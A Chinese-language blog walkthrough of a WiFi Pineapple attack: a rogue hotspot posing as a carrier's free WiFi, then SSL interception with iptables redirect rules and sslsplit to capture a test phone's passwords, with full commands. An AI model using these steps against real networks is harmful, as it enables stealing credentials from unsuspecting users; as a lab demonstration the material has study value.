wifipineapple,便携wifi攻击

江小悠 140 0

wifipineapple,便携wifi攻击

今天日常值班看门,后来TRY队长看我这么辛苦,送我了一个小玩具,wifipineapple国产版。

这东西可是跟着队长打遍了天下,当队长送给我的那一刻,我热泪盈眶,双手接过,我知道,手上的责任有多大。

回到宿舍,我接上祖传5w毫安充电宝,就组成便携WIFI攻击设备,这得多便携?配置完成后,只需一个手机和wifipineapple完成攻击操作,后面演示一下中间人攻击获取账号密码。

wifipineapple,便携wifi攻击

电脑连接wifipineapple开启的wifi,这里是Pineapple_B6C8,浏览器打开172.16.42.1:1741,设置一个免费WIFI:CMCC_5G

wifipineapple,便携wifi攻击

手机A开启数据热点,为pi,内置wlan1扫描连接pi,这时电脑可以上网。

wifipineapple,便携wifi攻击

连接shell,opkg update更新一下,sd.sh格式化挂载sd卡。

wifipineapple,便携wifi攻击
wifipineapple,便携wifi攻击

去modules安装插件,安装ConnectedClients,这里所有的模块都是安装到sd卡,ConnectedClients可以很方便的查看哪些设备连接了。

wifipineapple,便携wifi攻击

下载SSLsplit插件,安装环境,sslsplit插件会生成一个私有CA自签名证书,后面需要用到。我测试时很多GUI插件都无法启动,所以还是用命令行,到shell里opkg install sslsplit

拿出另一部手机B模仿被攻击者,连接CMCC_5G免费wifi,是可以正常上网,信号还不错。

wifipineapple,便携wifi攻击

拿出开热点的手机A,这时候wifipineapple的IP不是172.16.42.1,浏览器打开192.168.43.104:1471访问web管理界面。

wifipineapple,便携wifi攻击
wifipineapple,便携wifi攻击
wifipineapple,便携wifi攻击

mkdir -p /sd/sslplit/log/
先创建文件目录

之前用ConnectedClients查看到172.16.42.201的IP是手机B为被攻击者,使用sslsplit进行中间人攻击。

首先通过iptables将访问80,443端口的流量转发到8080,8443端口
iptables -t nat -F
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443

使用sslsplit命令监听本机的8080和8443端口,这里的证书是安装SSLsplit GUI插件时生成的
sslsplit -D -l /sd/sslsplit/connect.log -j /sd/sslsplit/ -S log/ -k /sd/modules/SSLsplit/cert/certificate.key -c /sd/modules/SSLsplit/cert/certificate.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080

wifipineapple,便携wifi攻击

模仿被攻击者,用手机B打开浏览器,虽然会有提醒但一般人不会管,试着输入账号密码,结束操作。

wifipineapple,便携wifi攻击
wifipineapple,便携wifi攻击

回到攻击者手机A,查看log文件下有很多数据包,grep -R 查看包含网址的文件,成功获取到账号密码。

wifipineapple,便携wifi攻击
wifipineapple,便携wifi攻击
wifipineapple,便携wifi攻击

ssh里看麻烦的话,可以vim /etc/nginx/nginx.conf
开启目录浏览,其他端口什么的可以自己改
autoindex on;
autoindex_exact_size off;
autoindex_localtime on;
charset utf-8,gbk;

wifipineapple,便携wifi攻击

浏览器访问80端口,查看源代码清楚看到数据包。

wifipineapple,便携wifi攻击
wifipineapple,便携wifi攻击

wifipineapple,便携wifi攻击

发表评论 取消回复
表情 图片 链接 代码

分享